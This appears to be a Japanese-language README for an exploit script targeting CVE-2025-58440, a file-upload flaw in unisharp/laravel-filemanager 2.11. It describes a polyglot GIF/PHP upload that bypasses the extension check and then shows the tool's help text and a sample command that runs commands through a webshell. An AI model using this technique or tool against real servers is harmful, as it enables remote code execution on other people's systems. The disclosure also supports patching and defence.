
Laravel FileManager における Polyglot ファイル攻撃と NULL バイトインジェクションによるリモートコード実行 (RCE)
Laravel FileManager におけるポリグロットファイル攻撃とヌルバイトインジェクションによるリモートコード実行(RCE)
unisharp/laravel-filemanager パッケージのバージョン 2.11 は、ファイルアップロード時のファイルタイプ検証が不適切なため、リモートコード実行(RCE) に対して脆弱です。この脆弱性により、攻撃者はファイル拡張子の検証を悪用して、GIF 画像を装った悪意のある PHP ファイルをアップロードできます。具体的には、攻撃者は .php 拡張子にピリオド(.)を追加し、GIF89a; ヘッダーを含めることで、ファイルを画像に見せかけ、検証チェックを回避できます。これにより、攻撃者はサーバー上で任意の PHP コードを実行でき、リモートコード実行(RCE) につながります。
python3 CVE-2025-58440.py <target> [--flags]
Laravel File Manager Exploit (CVE-2025-58440)
positional arguments:
target Target URL (e.g., 127.0.0.1:8000)
options:
-h, --help show this help message and exit
-C, --cookie COOKIE Session cookies
-d, --directory DIRECTORY Working directory (default: /tmp)
-f, --filename FILENAME Filename to upload (default: random)
-p, --payload COMMAND Command to execute through the webshell (e.g., 'id', 'whoami') (default: id)
python3 CVE-2025-58440.py 127.0.0.1:8000 -C "laravel-session=value" -p "whoami"
